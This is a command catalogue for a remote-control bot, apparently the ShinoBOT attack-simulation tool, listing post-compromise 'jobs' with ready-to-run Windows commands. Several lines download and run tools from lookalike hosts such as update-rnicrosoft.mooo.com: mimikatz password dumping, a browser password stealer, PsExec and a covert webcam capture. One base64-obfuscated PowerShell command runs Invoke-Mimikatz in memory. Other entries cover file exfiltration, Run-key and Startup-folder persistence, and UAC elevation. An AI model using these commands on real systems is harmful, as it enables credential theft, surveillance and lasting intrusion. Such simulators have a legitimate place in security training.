| ID | NAME | 
|---|---|
| CATEGORY | COMMAND | 
| CREATED | DESCRIPTION | 
| 14 | Download a file | 
| Add Weapon | powershell (new-object System.Net.WebClient).DownloadFile('%PARAMETER1%' , '%TEMP%\temp.dat'); | 
| 2015-03-23 13:27:29(10y 34w) | Download a file from the specified URL. PARAMETER (Must) -- URL e.g.)http://shinosec.com/  | 
| 35 | Download PsExec | 
| Add Weapon | powershell (new-object System.Net.WebClient).DownloadFile('http://update-rnicrosoft.mooo.com/files/85df66b931cfbfb0_PsExec.exe','%TEMP%\pse.exe'); dir %TEMP%\pse.exe  | 
| 2016-08-07 20:53:09(9y 14w) | Download PsExec (v2.11) https://technet.microsoft.com/en-us/sysinternals/psexec.aspx NO PARAMETER  | 
| 13 | Upload a file | 
| Data Exfiltration | powershell [convert]::ToBase64String((Get-Content %PARAMETER1% -Encoding byte)) | 
| 2015-03-23 12:45:06(10y 34w) | Upload a client file to this server.  PARAMETER (Must) --- File Path e.g.) C:\Users\Administrator\Desktop\secret.doc  | 
| 20 | Get Domain Admins Name | 
| Internal Recon | net group "Domain Admins" /domain | 
| 2015-04-03 11:38:57(10y 32w) | Get the domain administrators (members of the Domain Admins group). NO PARAMETER  | 
| 21 | Get Local Administrators Name | 
| Internal Recon | net localgroup "Administrators" | 
| 2015-04-03 11:41:45(10y 32w) | Get the local administrators account name. | 
| 23 | Get the Neighbour IP Address | 
| Internal Recon | arp -a | 
| 2015-04-04 15:18:31(10y 32w) | Get the neighbour PC's IP Address using the ARP table. NO PARAMETER  | 
| 26 | Get the Windows Password with Mimikatz | 
| Internal Recon | powershell (new-object System.Net.WebClient).DownloadFile('http://shinomal.mooo.com/files/6fdc6cf5e9c53aa2_mimikatz.exe' , '%TEMP%\mimikatz.exe'); %temp%\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit | findstr Password  | 
| 2015-04-04 15:31:03(10y 32w) | Download mimikatz (http://blog.gentilkiwi.com/mimikatz) and execute it. NO PARAMETER Administrator Rights required.  | 
| 34 | Steal Browser Password with bpd.exe | 
| Internal Recon | powershell (new-object System.Net.WebClient).DownloadFile('http://update-rnicrosoft.mooo.com/files/994b8d282016bc21_BrowserPasswordDump.exe' , '%TEMP%\bpd.exe'); %TEMP%\bpd.exe  | 
| 2016-08-07 20:32:22(9y 14w) | Steal the password stored by browser. NO PARAMETER  | 
| 36 | CAPSLOCK Dance | 
| Joke | echo Set wshShell =wscript.CreateObject("WScript.Shell") > capslock.vbs echo do >> capslock.vbs echo wscript.sleep 1000 >> capslock.vbs echo wshshell.sendkeys "{CAPSLOCK}" >> capslock.vbs echo loop >> capslock.vbs wscript capslock.vbs  | 
| 2016-08-11 02:14:28(9y 13w) | Toggle the Capslock key repeatedly. Kill the process wscript.exe to stop this nightmare. Command example) taskkill /F /IM wscript.exe NO PARAMETER  | 
| 37 | Speech | 
| Joke | echo Dim message, sapi > speech.vbs echo message="%PARAMETER1%" >> speech.vbs echo Set sapi=CreateObject("sapi.spvoice") >> speech.vbs echo sapi.Speak message >> speech.vbs wscript speech.vbs  | 
| 2016-08-11 03:11:19(9y 13w) | Speak the specified text. PARAMETER (Mandatory) The text you want to speak.  | 
| 38 | Open CD tray | 
| Joke | echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) > cdtray.vbs echo Set colCDROMs = oWMP.cdromCollection >> cdtray.vbs echo if colCDROMs.Count >= 1 then >> cdtray.vbs echo do >> cdtray.vbs echo For i = 0 to colCDROMs.Count - 1 >> cdtray.vbs echo colCDROMs.Item(i).Eject >> cdtray.vbs echo Next ' cdrom >> cdtray.vbs echo For i = 0 to colCDROMs.Count - 1 >> cdtray.vbs echo colCDROMs.Item(i).Eject >> cdtray.vbs echo Next ' cdrom >> cdtray.vbs echo loop >> cdtray.vbs echo End If >> cdtray.vbs wscript cdtray.vbs  | 
| 2016-08-11 07:45:58(9y 13w) | Open the CD tray repeatedly. Kill the process wscript.exe to stop this nightmare. Command example) taskkill /F /IM wscript.exe NO PARAMETER  | 
| 15 | Free Command | 
| Misc | |
| 2015-03-23 14:42:46(10y 34w) | This job has no command of its own, so the parameter is used as the command; this lets you run a command that is not in the job repository. PARAMETER (Must) --- Command e.g.) ipconfig /all  | 
| 18 | Capture Web Cam | 
| Misc | powershell (new-object System.Net.WebClient).DownloadFile('http://shinomal.mooo.com/files/3ebf375ce9a33d41_CommandCam.exe' , '%TEMP%\CommandCam.exe'); %TEMP%\CommandCam.exe /filename %temp%\image.bmp /quiet /delay %PARAMETER1%1 powershell [convert]::ToBase64String((Get-Content %TEMP%\image.bmp -Encoding byte))  | 
| 2015-04-03 08:51:49(10y 32w) | Download CommandCam (https://batchloaf.wordpress.com/commandcam/), execute it to take a picture, then upload the picture. PARAMETER (Option) -- Delay before taking the photo, in centiseconds. e.g.) 1000 means 10 seconds.  | 
| 22 | Auto Start Using Startup Folder | 
| Persistence | copy %PARAMETER1% %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ | 
| 2015-04-03 16:04:55(10y 32w) | Download the newest ShinoBOT to the startup folder. PARAMETER (Must) -- File name e.g.)ShinoBOT.exe  | 
| 43 | Auto Start With Run registry | 
| Persistence | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v ShinoBOT /d %PARAMETER1% | 
| 2016-10-25 08:10:14(9y 2w) | Add a registry key to start ShinoBOT after OS reboot. You have to specify the path of ShinoBOT. If you don't know it, use the "cd" command to check the current directory. PARAMETER(Must) -- ShinoBOT Path (absolute) e.g.)C:\User\username\ShinoBOT.exe  | 
| 41 | Run As Administrator | 
| Privilege Escalation | powershell Start-Process %PARAMETER1% -Verb RunAs | 
| 2016-09-14 05:16:52(9y 8w) | Same as "Run As Administrator". If UAC is enabled, a popup will appear. PARAMETER(Must) -- Executable path e.g.)%TEMP%\ShinoBOT.exe  | 
| 1 | Get Hostname (Default) | 
| System Information | hostname | 
| 2015-03-20 09:48:18(10y 34w) | Get host name. | 
| 2 | Get User Name / Domain Name (Default) | 
| System Information | whoami | 
| 2015-03-20 09:53:36(10y 34w) | Get the user name. PARAMETER (Optional) --- parameter of the whoami command e.g.) /ALL for details, /LOGONID for SID, /PRIV to enumerate the user privileges  | 
| 3 | Get local IP Address (Default) | 
| System Information | ipconfig | 
| 2015-03-20 09:56:36(10y 34w) | Get the local IP Address from ipconfig. NO PARAMETER  | 
| 4 | Get Current Directory (Default) | 
| System Information | cd | 
| 2015-03-20 09:59:18(10y 34w) | Get current directory.  NO PARAMETER  | 
| 10 | Screenshot (Default) | 
| System Information | SBOTshot powershell [convert]::ToBase64String((Get-Content %TEMP%\SBOTshot -Encoding byte))  | 
| 2015-03-23 08:49:56(10y 34w) | Take a screen shot. NO PARAMETER. | 
| 12 | Get Windows Version (Default) | 
| System Information | ver | 
| 2015-03-23 09:35:31(10y 34w) | Get the Windows version using command ver. | 
| 16 | Get System Info Details (Default) | 
| System Information | systeminfo | 
| 2015-03-24 01:54:52(10y 34w) | Get the hardware details, NIC information, and applied hotfixes. NO PARAMETER  | 
| 19 | Get Time Zone | 
| System Information | tzutil /g | 
| 2015-04-03 11:35:40(10y 32w) | Get Time Zone by tzutil command. NO PARAMETER  | 
| 24 | Get the File List | 
| System Information | dir /a:-d /b | 
| 2015-04-04 15:21:10(10y 32w) | Get the file list (not directory). PARAMETER -- Folder Path e.g.)C:\Users If no parameter is specified, the current directory will be used.  | 
| 25 | Get the Folder List | 
| System Information | dir /a:d /b | 
| 2015-04-04 15:22:35(10y 32w) | Get the folder list (not file). PARAMETER -- Folder Path e.g.)C:\Users If no parameter is specified, the current directory will be used.  | 
| 33 | Get Proxy Settings | 
| System Information | reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer | 
| 2015-04-24 05:25:55(10y 29w) | NO PARAMETER | 
| 39 | Invoke Mimikatz | 
| System Information | powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUwBoADEAbgAwAGcAMQAvAFAAbwBzAHQALQBDAG8AbQBwAHIAbwBtAGkAcwBlAGQALQBUAG8AbwBsAHMALwBtAGEAcwB0AGUAcgAvAGkAbQAuAHAAcwAxACcAKQA7ACAAJABvAHUAdABwAHUAdAA9AEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwA7ACAAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAkAG8AdQB0AHAAdQB0AA== | 
| 2016-09-12 14:50:50(9y 9w) | Get Windows passwords with Mimikatz injected into memory; no file access. NO PARAMETER *Administrator Rights required.  | 
| 40 | Ask Admin Rights by UAC | 
| System Information | powershell Start-Process %PARAMETER1% -Verb runAs | 
| 2016-09-12 14:55:15(9y 9w) | Get Administrator Rights via UAC. PARAMETER(Must) -- File Path e.g.)C:\temp\ShinoBOT.exe  | 
| 44 | Check Login User | 
| System Information | query user | 
| 2016-10-25 08:34:22(9y 2w) | Check the existing user sessions and login times. NO PARAMETER  |